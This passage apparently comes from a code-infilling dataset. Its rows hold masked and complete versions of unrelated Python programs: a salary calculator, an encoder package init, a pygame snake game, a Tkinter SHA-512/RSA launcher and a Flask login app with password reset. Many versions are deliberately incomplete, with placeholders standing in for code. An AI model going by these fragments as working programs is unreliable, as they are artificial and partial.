    'An employee who earned R$ {:.2f} will earn R$ {:.2f} after a 15% raise'
    .format(salario, novo))
| salario = float(input('What is your current salary? R$ '))
novo = salario + (salario * 15 / 100)
print('An employee who earned R$ {:.2f} will earn R$ {:.2f} after a 15% raise'.format(salario, novo)) | null | [0, 1, 2, 3] |
1,658 | d28e517e72c3689e973a5b1255d414648de418fb | <mask token>
| <mask token>
__all__ = ['CountEncoder', 'CombinCountEncoder', 'FrequencyEncoder',
'NullCounter', 'AutoCalcEncoder', 'extract_obj_cols']
| from CategoryReplacer.CategoryReplcaers import CountEncoder
from CategoryReplacer.CategoryReplcaers import CombinCountEncoder
from CategoryReplacer.CategoryReplcaers import FrequencyEncoder
from CategoryReplacer.CategoryReplcaers import NullCounter
from CategoryReplacer.CategoryReplcaers import AutoCalcEncoder
from CategoryReplacer.CategoryReplcaers import extract_obj_cols
__all__ = ['CountEncoder', 'CombinCountEncoder', 'FrequencyEncoder',
'NullCounter', 'AutoCalcEncoder', 'extract_obj_cols']
| from CategoryReplacer.CategoryReplcaers import CountEncoder
from CategoryReplacer.CategoryReplcaers import CombinCountEncoder
from CategoryReplacer.CategoryReplcaers import FrequencyEncoder
from CategoryReplacer.CategoryReplcaers import NullCounter
from CategoryReplacer.CategoryReplcaers import AutoCalcEncoder
from CategoryReplacer.CategoryReplcaers import extract_obj_cols
__all__ = [
"CountEncoder",
"CombinCountEncoder",
"FrequencyEncoder",
"NullCounter",
"AutoCalcEncoder",
"extract_obj_cols"
] | null | [0, 1, 2, 3] |
1,659 | 2b14607aa2527f5da57284917d06ea60e89f784c | <mask token>
class GAME:
<mask token>
<mask token>
<mask token>
<mask token>
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
<mask token>
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect
):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0
].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x,
self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1
| <mask token>
class GAME:
<mask token>
<mask token>
<mask token>
def rem_rockets(self):
for rocket in self.rockets:
if not rocket.out_of_frame():
self.rockets.remove(rocket)
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
def draw_elements(self, screen):
if self.mode == 0:
screen.blit(bg, (0, 0))
elif self.mode == 1:
screen.fill((155, 199, 167))
self.coin.draw_coin(screen)
self.snake.draw_snake(screen)
self.check_timer()
if self.count >= self.condition:
self.bombs.insert(0, Bomb(self.mode))
self.condition = self.condition * 2
for rocket in self.rockets:
rocket.draw_rocket(screen)
for bomb in self.bombs:
bomb.draw_bomb(screen)
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect
):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0
].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x,
self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1
| <mask token>
class GAME:
def __init__(self, mode) ->None:
self.playing = 0
self.mode = mode
self.coin = Coin(self.mode)
self.moving_coin = pygame.sprite.Group()
self.moving_coin.add(self.coin)
self.snake = Snake(self.mode)
self.bombs = [Bomb(self.mode)]
self.rockets = []
self.condition = 4
self.crowd = 2
self.count = 0
self.anim_pos = [Vector2(-1, -1), Vector2(-1, -1), Vector2(-1, -1)]
self.game_timer = 0
self.game_over = False
def refresh(self, mode):
self.__init__(mode)
return 1, 1
<mask token>
def rem_rockets(self):
for rocket in self.rockets:
if not rocket.out_of_frame():
self.rockets.remove(rocket)
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
def draw_elements(self, screen):
if self.mode == 0:
screen.blit(bg, (0, 0))
elif self.mode == 1:
screen.fill((155, 199, 167))
self.coin.draw_coin(screen)
self.snake.draw_snake(screen)
self.check_timer()
if self.count >= self.condition:
self.bombs.insert(0, Bomb(self.mode))
self.condition = self.condition * 2
for rocket in self.rockets:
rocket.draw_rocket(screen)
for bomb in self.bombs:
bomb.draw_bomb(screen)
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect
):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0
].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x,
self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1
| <mask token>
class GAME:
def __init__(self, mode) ->None:
self.playing = 0
self.mode = mode
self.coin = Coin(self.mode)
self.moving_coin = pygame.sprite.Group()
self.moving_coin.add(self.coin)
self.snake = Snake(self.mode)
self.bombs = [Bomb(self.mode)]
self.rockets = []
self.condition = 4
self.crowd = 2
self.count = 0
self.anim_pos = [Vector2(-1, -1), Vector2(-1, -1), Vector2(-1, -1)]
self.game_timer = 0
self.game_over = False
def refresh(self, mode):
self.__init__(mode)
return 1, 1
def update(self):
self.snake.move_snake()
self.check_collision()
self.check_fail()
self.rem_rockets()
def rem_rockets(self):
for rocket in self.rockets:
if not rocket.out_of_frame():
self.rockets.remove(rocket)
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
def draw_elements(self, screen):
if self.mode == 0:
screen.blit(bg, (0, 0))
elif self.mode == 1:
screen.fill((155, 199, 167))
self.coin.draw_coin(screen)
self.snake.draw_snake(screen)
self.check_timer()
if self.count >= self.condition:
self.bombs.insert(0, Bomb(self.mode))
self.condition = self.condition * 2
for rocket in self.rockets:
rocket.draw_rocket(screen)
for bomb in self.bombs:
bomb.draw_bomb(screen)
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect
):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0
].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x,
self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1
| import pygame
from .Coin import Coin
from .Snake import Snake, Block
from .Bomb import Bomb
from .Rocket import Rocket
from pygame.math import Vector2
cell_size = 16
cell_number = 30
sprite_cell = pygame.image.load("Assets/Cell.png")
bg = pygame.image.load("Assets/BG.png")
bg2 = pygame.image.load("Assets/BG2.png")
class GAME():
def __init__(self, mode) -> None:
self.playing = 0
self.mode = mode
# Classic mode
        # Colorful mode with assets etc
self.coin = Coin(self.mode)
self.moving_coin = pygame.sprite.Group()
self.moving_coin.add(self.coin)
self.snake = Snake(self.mode)
self.bombs = [Bomb(self.mode)]
self.rockets = []
self.condition = 4
self.crowd = 2
self.count = 0
self.anim_pos = [Vector2(-1,-1), Vector2(-1,-1), Vector2(-1,-1)]
self.game_timer = 0
self.game_over = False
# self.acc = 0.1
# self.difficulty = 0
def refresh(self, mode):
self.__init__(mode)
return 1, 1
def update(self):
self.snake.move_snake()
self.check_collision()
self.check_fail()
self.rem_rockets()
def rem_rockets(self):
for rocket in self.rockets:
if not rocket.out_of_frame():
self.rockets.remove(rocket)
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
def draw_elements(self, screen):
if self.mode == 0:
screen.blit(bg, (0, 0))
elif self.mode == 1:
screen.fill((155, 199, 167))
self.coin.draw_coin(screen)
self.snake.draw_snake(screen)
self.check_timer()
if self.count >= self.condition:
self.bombs.insert(0, Bomb(self.mode))
self.condition = self.condition * 2
for rocket in self.rockets:
rocket.draw_rocket(screen)
for bomb in self.bombs:
bomb.draw_bomb(screen)
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
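        # coin pickup grows the snake; rockets clip any snake block, bomb or coin they overlap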
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
                    if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
        for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x, self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
                self.game_over = 1 | [5, 7, 9, 10, 13] |
1,660 | da696961fea72e1482beae73c19b042b94d93886 | <mask token>
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
<mask token>
def select_file():
Tk().withdraw()
filename = askopenfilename()
return filename
def hash_sha512(message):
h = SHA512.new()
h.update(str(message))
signature = h.hexdigest()
return signature
<mask token>
| <mask token>
def ask_user(prompt, command):
root = Tkinter.Tk()
var = tkSimpleDialog.askstring(str(prompt), str(command))
return var
def read_file_line(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_key_file(key_name):
filename = os.path.join(fileDir, str(key_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
def pop_window(title, message):
tkMessageBox.showinfo(title, message)
def select_file():
Tk().withdraw()
filename = askopenfilename()
return filename
def hash_sha512(message):
h = SHA512.new()
h.update(str(message))
signature = h.hexdigest()
return signature
def main():
decision = ask_user('DECIDE', 'RSA: type 1 to add file or type 2 to verify'
)
if decision == str(1):
execfile('RSAencr.py')
elif decision == str(2):
execfile('RSAdecr.py')
else:
exit(4)
main()
| <mask token>
fileDir = os.path.dirname(os.path.realpath(__file__))
def ask_user(prompt, command):
root = Tkinter.Tk()
var = tkSimpleDialog.askstring(str(prompt), str(command))
return var
def read_file_line(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_key_file(key_name):
filename = os.path.join(fileDir, str(key_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
def pop_window(title, message):
tkMessageBox.showinfo(title, message)
def select_file():
Tk().withdraw()
filename = askopenfilename()
return filename
def hash_sha512(message):
h = SHA512.new()
h.update(str(message))
signature = h.hexdigest()
return signature
def main():
decision = ask_user('DECIDE', 'RSA: type 1 to add file or type 2 to verify'
)
if decision == str(1):
execfile('RSAencr.py')
elif decision == str(2):
execfile('RSAdecr.py')
else:
exit(4)
main()
| from Crypto.Hash import SHA512
from Crypto.PublicKey import RSA
from Crypto import Random
from collections import Counter
from Tkinter import Tk
from tkFileDialog import askopenfilename
import ast
import os
import tkMessageBox
from Tkinter import Tk
from tkFileDialog import askopenfilename
import Tkinter
import tkSimpleDialog
import tkMessageBox
from Crypto.Hash import SHA512
from Crypto.PublicKey import RSA
from Crypto import Random
from collections import Counter
from Tkinter import Tk
from tkFileDialog import askopenfilename
import ast
import os
import tkMessageBox
from Tkinter import Tk
from tkFileDialog import askopenfilename
import Tkinter
import tkSimpleDialog
import tkMessageBox
fileDir = os.path.dirname(os.path.realpath(__file__))
def ask_user(prompt, command):
root = Tkinter.Tk()
var = tkSimpleDialog.askstring(str(prompt), str(command))
return var
def read_file_line(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_key_file(key_name):
filename = os.path.join(fileDir, str(key_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
def pop_window(title, message):
tkMessageBox.showinfo(title, message)
def select_file():
Tk().withdraw()
filename = askopenfilename()
return filename
def hash_sha512(message):
h = SHA512.new()
h.update(str(message))
signature = h.hexdigest()
return signature
def main():
decision = ask_user('DECIDE', 'RSA: type 1 to add file or type 2 to verify'
)
if decision == str(1):
execfile('RSAencr.py')
elif decision == str(2):
execfile('RSAdecr.py')
else:
exit(4)
main()
| from Crypto.Hash import SHA512
from Crypto.PublicKey import RSA
from Crypto import Random
from collections import Counter
from Tkinter import Tk
from tkFileDialog import askopenfilename
import ast
import os
import tkMessageBox
from Tkinter import Tk
from tkFileDialog import askopenfilename
import Tkinter
import tkSimpleDialog
import tkMessageBox
from Crypto.Hash import SHA512
from Crypto.PublicKey import RSA
from Crypto import Random
from collections import Counter
from Tkinter import Tk
from tkFileDialog import askopenfilename
import ast
import os
import tkMessageBox
from Tkinter import Tk
from tkFileDialog import askopenfilename
import Tkinter
import tkSimpleDialog
import tkMessageBox
fileDir = os.path.dirname(os.path.realpath(__file__))
def ask_user(prompt, command):
root = Tkinter.Tk()
var = tkSimpleDialog.askstring(str(prompt), str(command))
#print var
return var
def read_file_line(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_key_file(key_name):
filename = os.path.join(fileDir, str(key_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
def pop_window(title, message):
tkMessageBox.showinfo(title, message)
def select_file():
Tk().withdraw() # we don't want a full GUI, so keep the root window from appearing
filename = askopenfilename() # show an "Open" dialog box and return the path to the selected file
return filename
def hash_sha512(message):
# SHA512 HASHING OF THE INPUT FILE
h = SHA512.new()
h.update(str(message))
# digest() Return the binary (non-printable) digest of the message that has been hashed so far.
# hexdigest() Return the printable digest of the message that has been hashed so far.
signature = h.hexdigest()
return signature
def main():
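    # dispatcher: "1" launches the add/encrypt flow (RSAencr.py), "2" the verify flow (RSAdecr.py)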
decision = ask_user("DECIDE", "RSA: type 1 to add file or type 2 to verify")
if decision == str(1):
execfile("RSAencr.py")
elif decision == str(2):
execfile("RSAdecr.py")
else:
exit(4)
main() | [3, 9, 10, 11, 12] |
1,661 | c0ad3d642f28cb11a8225d4d011dbb241bd88432 | <mask token>
| <mask token>
print(' The double of {} is {}'.format(n, n * 2))
print(' The triple of {} is {}'.format(n, n * 3))
print(' The square root of {} is {}'.format(n, n * n))
| n = int(input('Enter an integer: '))
print(' The double of {} is {}'.format(n, n * 2))
print(' The triple of {} is {}'.format(n, n * 3))
print(' The square root of {} is {}'.format(n, n * n))
| null | null | [0, 1, 2] |
1,662 | d39cc2dbbc83869e559f8355ceba5cf420adea5e | class Solution:
<mask token>
<mask token>
| class Solution:
def isUgly(self, num):
if num == 0:
return False
for n in [2, 3, 5]:
while num % n == 0:
num = num / n
return num == 1
<mask token>
| class Solution:
def isUgly(self, num):
if num == 0:
return False
for n in [2, 3, 5]:
while num % n == 0:
num = num / n
return num == 1
<mask token>
print(a.isUgly(14))
print(a.isUgly(8))
print(a.isUgly(6))
print(a.isUgly(0))
| class Solution:
def isUgly(self, num):
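        # repeatedly strip the prime factors 2, 3 and 5; an ugly number reduces to exactly 1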
if num == 0:
return False
for n in [2, 3, 5]:
while num % n == 0:
num = num / n
return num == 1
a = Solution()
print(a.isUgly(14))
print(a.isUgly(8))
print(a.isUgly(6))
print(a.isUgly(0))
| null | [1, 2, 3, 4] |
1,663 | f6a3693fe81e629d987067265bf4e410bf260bcf | <mask token>
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds=1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
        return User.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
submit = SubmitField('Update')
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError(
                'There is no account with that email. You must register first.'
)
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/', methods=['GET', 'POST'])
def home():
return render_template('index.html')
<mask token>
@app.route('/login/', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
                flash('Logged In As {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
<mask token>
@app.route('/learn_more/', methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
<mask token>
@app.route('/model_page/', methods=['GET', 'POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject='Password Reset Request', sender=
'[email protected]', recipients=[user.email])
msg.body = f""" To reset your password, visit the following link :
{url_for('reset_token', token=token, _external=True)}
If you did not make this request then simply ignore this email and no changes will be made.
"""
mail.send(msg)
<mask token>
| <mask token>
def get_config(fname):
"""
Creates connection to yaml file which holds the DB user and pass
"""
with open(fname) as f:
cfg = yaml.load(f, Loader=yaml.SafeLoader)
return cfg
<mask token>
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds=1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
        return User.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
submit = SubmitField('Update')
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError(
                'There is no account with that email. You must register first.'
)
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/', methods=['GET', 'POST'])
def home():
return render_template('index.html')
<mask token>
@app.route('/login/', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
                flash('Logged In As {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
<mask token>
@app.route('/learn_more/', methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
<mask token>
@app.route('/model_page/', methods=['GET', 'POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject='Password Reset Request', sender=
'[email protected]', recipients=[user.email])
msg.body = f""" To reset your password, visit the following link :
{url_for('reset_token', token=token, _external=True)}
If you did not make this request then simply ignore this email and no changes will be made.
"""
mail.send(msg)
<mask token>
| <mask token>
def get_config(fname):
"""
Creates connection to yaml file which holds the DB user and pass
"""
with open(fname) as f:
cfg = yaml.load(f, Loader=yaml.SafeLoader)
return cfg
<mask token>
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds=1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
        return User.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
submit = SubmitField('Update')
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError(
                'There is no account with that email. You must register first.'
)
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/', methods=['GET', 'POST'])
def home():
return render_template('index.html')
<mask token>
@app.route('/login/', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
                flash('Logged In As {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
<mask token>
@app.route('/logout/')
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/learn_more/', methods=['GET', 'POST'])
def learn_more():
